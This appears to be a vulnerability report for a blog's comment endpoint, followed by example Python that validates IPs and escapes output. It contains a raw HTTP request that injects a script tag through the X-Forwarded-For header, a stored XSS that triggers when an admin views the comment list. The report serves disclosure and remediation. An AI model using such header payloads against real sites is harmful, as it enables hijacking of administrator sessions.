Send an HTTP request like the following:

```
POST /post/addComment HTTP/1.1
Host: hostname.cc:8080
Content-Length: 87
Cache-Control: max-age=0
Origin: http://hostname.cc:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://x.cc:8080/post/hello-world
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
X-forwarded-for:<script>alert('xss')</script>
Connection: close

userComment=asd&userName=asd&userMail=asd&webHome=asd&submit=%E6%8F%90%E4%BA%A4&logId=1
```

Viewing the comment list in the admin backend triggers it directly.

The IP taken from the header should be filtered here when it is read.
Apply uniform filtering to all user-supplied data that is stored in the database.
b921c1a
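
The two mitigations discussed in this issue (validate the IP read from the header before storing it, and escape stored fields when the admin list renders them), as an added example that is not code from this project or from the referenced commit. The function names, the `peer_addr` fallback and the row layout are assumptions made for illustration.

```python
import html
import ipaddress


def client_ip(headers, peer_addr):
    """Return a syntactically valid IP string to store with a comment.

    headers   -- dict of request header names to values (hypothetical shape)
    peer_addr -- address of the TCP peer as seen by the server
    """
    raw = ""
    for name, value in headers.items():
        if name.lower() == "x-forwarded-for":
            raw = value
            break
    # The header may carry a comma-separated proxy chain; take the first entry.
    # It is still client-controlled unless a trusted proxy overwrites it, so
    # this check guarantees only that the stored value is an IP, not that it
    # is the real one.
    candidate = raw.split(",")[0].strip()
    try:
        return str(ipaddress.ip_address(candidate))
    except ValueError:
        # Anything that does not parse as IPv4/IPv6 is discarded.
        return str(ipaddress.ip_address(peer_addr))


def render_comment_row(comment):
    """Build one admin-list table row, HTML-escaping every stored field."""
    fields = (comment["userName"], comment["userComment"], comment["ip"])
    cells = "".join(f"<td>{html.escape(f, quote=True)}</td>" for f in fields)
    return f"<tr>{cells}</tr>"


# Constructed sample input reproducing the header value from the report.
SAMPLE_HEADERS = {"X-forwarded-for": "<script>alert('xss')</script>"}
SAMPLE_PEER = "203.0.113.7"  # constructed documentation address

if __name__ == "__main__":
    ip = client_ip(SAMPLE_HEADERS, SAMPLE_PEER)
    print(ip)
    # Rows stored before the input check existed still render inertly.
    legacy = {"userName": "asd", "userComment": "asd",
              "ip": SAMPLE_HEADERS["X-forwarded-for"]}
    print(render_comment_row(legacy))
```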